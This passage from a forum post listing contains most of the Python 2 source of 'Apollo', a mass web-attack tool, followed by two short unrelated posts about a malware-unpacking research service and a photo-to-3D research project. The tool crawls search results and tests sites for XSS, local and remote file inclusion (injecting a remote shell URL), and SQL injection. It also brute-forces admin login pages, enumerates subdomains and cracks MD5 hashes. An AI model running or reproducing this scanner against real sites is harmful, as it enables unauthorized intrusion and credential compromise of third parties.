+ url else: print "Lfi: " + url write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """"><script>alert('xss')</script>""" self.file = 'Xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("<script>alert('xss')</script>", data, re.I)): self.xss(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Xss: " + url write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'Rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): #Or change to whatever is going to be in your shell for sure. self.rfi(link) vuln += 1 else: print link + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Rfi: " + url write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print 'Found: ' + site class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + ' Vulnerable Sites Found' print '>> ' + str(invuln) + ' Sites Not Vulnerable' print '>> ' + str(np) + ' Sites Without Parameters' if option == '1': print '>> Output Saved To Sqli.txt\n' elif option == '2': print '>> Output Saved To Lfi.txt' elif option == '3': print '>> Output Saved To Xss.txt' elif option == '4': print '>> Output Saved To Rfi.txt' def main(): """Outputs Menu and gets input""" red = "\033[01;31m{0}\033[00m" quotes = [ '\n"Three things cannot be long hidden: the sun, the moon, and the truth."\n', '\n"Nothing holds it together except an idea which is indestructible"\n', '\n"I am not a liberator. Liberators do not exist. The people liberate themselves."\n', '\n"Heresy is just another word for freedom of thought".\n', '\n"The tragedy of modern war is that the young men die fighting each other - instead of their real enemies back home in the capitals"\n', '\n"A man is no less a slave because he is allowed to choose a new master once in a term of years."\n' ] print red.format(''' _____ _ _ / ___| | | | | \ `--. ___ | |_ __| | `--. \/ _ \| __|/ _` | /\__/ / (_) | |_ (_| | \____/ \___/ \__|\__,_| ################################################# # | # # \ _ / # # Welcome to Apollo -= (_) =- # #Options: / \ # #[1] Sqli | # #[2] Lfi # #[3] Xss # #[4] Rfi # #[5] Routers # #[6] Admin Page Finder # #[7] Sub Domain Scan # #[8] Dictionary MD5 cracker # #[9] Online MD5 cracker # #[10] Check IP # ################################################# ''') global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print red.format(choice(quotes)) elif option == '2': Crawl() output() print red.format(choice(quotes)) elif option == '3': Crawl() output() print red.format(choice(quotes)) elif option == '4': Crawl() output() print red.format(choice(quotes)) elif option == '5': Ip() print red.format(choice(quotes)) elif option == '6': admin() aprint() print red.format(choice(quotes)) elif option == '7': subd() print red.format(choice(quotes)) elif option == '8': word() print red.format(choice(quotes)) elif option == '9': OnlineCrack().crack() print red.format(choice(quotes)) elif option == '10': Check().grab() print red.format(choice(quotes)) else: print '\nInvalid Choice\n' time.sleep(0.5) main() else: print '\nYou Must Enter An Option\n' time.sleep(0.5) main() if __name__ == '__main__': main()[/python] http://pastebin.com/RpvfXiF9 <--- Apollo http://pastebin.com/HekBD2d6 <--- Sample Results Download mirror Source
  24. Fi8sVrs
    Eureka is a binary static analysis preparation framework. It implements a novel binary unpacking strategy based on statistical bigram analysis and coarse-grained execution tracing. Eureka incorporates advanced API deobfuscation capabilities to facilitate the structural analysis of the underlying malware logic. For each uploaded binary, the Eureka service will attempt to unpack and (for Eureka I, disassemble; for Eureka II (not yet available), decompile) the binary, and will produce an annotated callgraph, subroutine/data index page, strings summary, and a list of embedded DNS entries. Notice: The data on this website is for research purposes only. It is provided for your personal use only and is supplied AS IS, without warranty of any kind. Use or reliance on this data is at your own risk. Development Team: Monirul Sharif (Georgia Tech), Vinod Yegneswaran (SRI), Hassen Saidi (SRI), Phillip Porras (SRI), Arvind Naryanan (UTexas Austin) Eureka Malware Analysis Page
  25. Fi8sVrs
    A research group at Tokyo Institute of Technology is developing a system that quickly creates 3D spacial data from photos taken with a digital camera. This system uses SfM, or Structure from Motion, which estimates the 3D shape and camera position from several pictures of the same scene. To reproduce spatial position data, it repeatedly identifies and matches characteristic points between two pictures. The group has achieved an efficient 3D restoration method, by detecting pictures that aren't suitable and doing overall optimization in line with the cumulative error. Via: DigInfo TV
×
×
  • Create New...